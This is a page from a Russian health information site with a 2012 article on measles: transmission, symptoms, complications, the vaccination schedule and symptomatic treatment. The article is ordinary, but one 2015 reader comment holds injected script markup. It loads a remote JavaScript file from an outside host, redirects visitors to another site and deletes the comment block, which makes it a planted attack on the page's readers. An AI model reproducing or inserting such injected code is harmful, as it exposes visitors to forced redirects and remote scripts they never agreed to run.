Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Грозит ли вам заболевание...  >>  Грозит ли вам заболевание корью?
 
Обратная связь
 

Грозит ли вам заболевание корью?

Размер шрифта
13 февраля 2012 10:00
  • google_analytics: false
  • Нравится

За февраль месяц в Москве и Санкт-Петербурге диагноз «корь» подтвердили более чем у сотни горожан. Выявление заболевших корью осложняет и тот факт, что первичные симптомы (высокую температуру, насморк, кашель) нередко путают с симптомами простуды или гриппа, а вот сыпь на теле появляется лишь на четвертый день развития заболевания.

1 

Корь – острая инфекционная болезнь, характеризующаяся лихорадкой, катаральным воспалением слизистых оболочек верхних дыхательных путей и глаз, а также пятнисто-папулезной сыпью на коже.

Как происходит заражение

Корь распространена повсеместно. Восприимчивость человека к вирусу кори чрезвычайно высока – почти 100%. Болеют корью люди разного возраста, но чаще дети 4–5 лет.

Источник инфекции – больной человек.

Основной путь инфицирования – воздушно-капельный, реже – контактный, то есть при кашле, чихании, разговоре и даже при дыхании.

Наибольшая заражаемость происходит в первые 3-4 дня еще до появления сыпи и в 1-й день появления сыпи. Через 5 дней после появления сыпи больной не заразен.

Симптомы

Возбудитель кори проникает через слизистые оболочки верхних дыхательных путей и глаз. Поэтому вначале отмечаются острые респираторные проявления (насморк, больное горло, острый «лающий кашель», конъюнктивит, резь в глазах, непереносимость яркого света, температура тела 39-40˚С).

На слизистой щек у коренных зубов появляются мелкие белесые пятнышки, окруженные узкой красной каймой – пятна Бельского – Филатова – Коплика – патогномоничные для кори.

Из слизистых верхних дыхательных путей вирус попадает в подслизистую оболочку, лимфатические узлы. После репродукции он поступает в кровь и поражает эндотелий кровеносных капилляров, обуславливая тем самым появление сыпи. Развиваются отек и некротические изменения тканей.

Поражение капилляров приводит к характерной пятнисто-папулезной сыпи на коже и на слизистых оболочках на 3–4-й день.

Сыпь, распространяется сверху вниз: сначала на лице, затем на туловище и конечностях. За сутки до появления сыпи на слизистой оболочке щек появляются мелкие пятна, окруженные красным ореолом. Заболевание длится 7–9 дней, после чего сыпь исчезает, не оставляя следов.

Осложнения

Возбудитель подавляет активность Т-лимфоцитов и иммунные реакции, что способствует появлению осложнений в виде пневмоний, воспаления среднего уха, энцефалит, менингит и подострый склерозирующий панэнцефалит, поскольку вирус может воздействовать на центральную нервную систему.

Особенно тяжело болезнь протекает у взрослых ранее не болевших и не привитых, с коревой пневмонией и бактериальными осложнениями.

Профилактика

В целях профилактики детям первого года жизни вводят специальные вакцины.

В России действует Национальная программа по борьбе с корью, задачей которой является полное уничтожение этой болезни на территории Российской Федерации. Вакцинация от кори входит в календарь обязательных прививок. Ее проводят не болевшим корью детям в возрасте 12-15 месяцев. Вторая прививка проводится в возрасте 6 лет (перед школой). Возможно введение как моновакцины (только против кори), так и тривакцины (против кори, паротита и краснухи).

Для экстренного предотвращения заражения корью лиц, не привитых ранее от данной инфекции, вакцину вводят в течение 72 часов после контакта с зараженным человеком.

Повторную вакцинацию желательно проводить регулярно – через 7-10 лет.

Как лечить

Специфического лечения кори нет. Поэтому лечение симптоматическое и направлено на предотвращение осложнений.

  • Температура, лихорадка и боль лечатся нестероидными противовоспалительными препаратами.

Детям, болеющим корью, не рекомендуется принимать аспирин, поскольку согласно результатам некоторых исследований аспирин может привести к развитию синдрома Рея.

  • Для снятия зуда на коже рекомендуются ежедневные ополаскивания тела и умывания раствором с порошком Деласкин (синтетический танин).
  • Для промывания глаз во время болезни можно использовать раствор пищевой соды. А при конъюктивите рекомендуют капли с антибиотиками (левомицитин 0,25%, альбуцид 20%).
  • В случае развития пневмонии или других бактериальных осложнений при кори показаны антибиотики, в тяжелых случаях крупа используются кортикостероиды.

Иммунитет после инфекции может сохраняться пожизненно.

 

Сюжеты по теме:
В России вспышка кори. Как спасти своих детей и не заболеть самим 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.